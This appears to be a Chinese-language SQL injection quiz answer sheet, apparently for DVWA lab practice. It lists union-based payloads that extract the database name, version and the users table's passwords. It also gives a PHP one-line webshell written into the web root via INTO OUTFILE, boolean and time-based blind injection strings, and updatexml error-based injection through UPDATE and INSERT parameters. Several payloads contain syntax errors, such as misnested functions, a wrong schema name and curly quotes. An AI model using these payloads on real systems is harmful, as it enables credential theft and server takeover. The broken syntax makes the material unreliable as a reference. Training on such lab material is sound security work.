1.常见的闭合方式有哪几种?
单引号、双引号、括号、或以上类型的相互组合,还有数字型
2.加载Payload的对应步骤及SQL(将对应的标号Payload写在答案区)
步骤 | 对应的SQL |
探测闭合方式 | 1 1' or 1=1 -- |
探测Select后列数 | 2 1' order by 1 (2,3...) -- |
将原结果显示为空 | 3 1' and 1=2 -- |
探测select后列对应的页面展示 | 4 1' and 1=2 union select 1,2,3 -- |
提取数据库名,用户名,版本号 | 5 1' and 1=2 union select database(),users(),version -- |
将数据库名、用户名、版本号用一个文本框展示,并且用“:”隔开 | 6 1' and 1=2 union select database(),users(),version |
查询Mysql数据库表集合 | 7 1' and 1=2 union select table_name,1 from information_schema.tables where table_schema='Mysql' -- |
查询数据库user表的列有哪些 | 8 1' and 1=2 union select column_name,1 from information_schema.columns where table_schema='dvwa' and table_name='users' -- |
查询数据库中user表的username和password的具体数据 | 9 1' and 1=2 union select username,password from users -- |
一句话木马 | 10 select 1,"<?php eval($_POST['123'])?>" into outfile 'D:\\xampp\\htdocs\\dvwa\\aa.php' |
3.布尔型盲注的Payload?(至少三种)
1' and 1=if(length(database())>8,1,2) %23
1' and 1=if(length(ascii(substr(database(),1,1))>128,1,2) %23
1’and 1=if(length(ascii(substr(select table_name from information.tables where table_schema=’databasename’)))>128,1,2) %23
4.时间型盲注的Payload?(至少三种)
1' and 1=if(length(database())>8,sleep(1),sleep(5)) %23
1' and 1=if(length(ascii(substr(database(),1,1))>128, sleep(1),sleep(5)) %23
1’and 1=if(length(ascii(substr(select table_name from information.tables where table_schema=’databasename’)))>128, sleep(1),sleep(5)) %23
5.select * from tablename where id=1 or 1=1 and 1=2输出结果为?
null
6.select * from tablename where id=1 and1=2 or 1=1输出结果为?
全表
7.利用报错函数updatexml()如何获取数据库名?
updatexml(1,concat(‘[‘database(),’]’),0)
8.update users set password='$password' where name='$admin'
上述语句如何传入参数$password、$admin 可以获取数据库名?
password=’$password’1’and 1=2 union select database() --
9.insert into user (id,username,password) values (2,$username,3);
上述语句如何传入参数$username可以获取到数据库名?
updatexml(1,concat(‘[‘database(),’]’),0)
10.TVNVeVlqRWxNMFFsZFVaR01VWT0%3D
1+1=?